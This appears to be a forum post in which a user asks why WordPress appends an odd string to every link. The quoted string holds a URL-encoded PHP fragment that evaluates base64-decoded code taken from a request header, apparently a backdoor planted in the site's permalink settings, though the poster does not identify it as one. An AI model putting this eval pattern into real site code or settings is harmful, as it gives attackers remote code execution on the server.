This just started today, and I'm not certain why it is happening. At the end of any link, WP is appending the following "/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/" to the end of the link.
I'm far from an expert on WP code (I deal mostly with Drupal) so I'm not certain how WP is building links/passing the link information information. The theme link is correctly set to <?php the_permalink() ?>.
Any thoughts on why this is happening?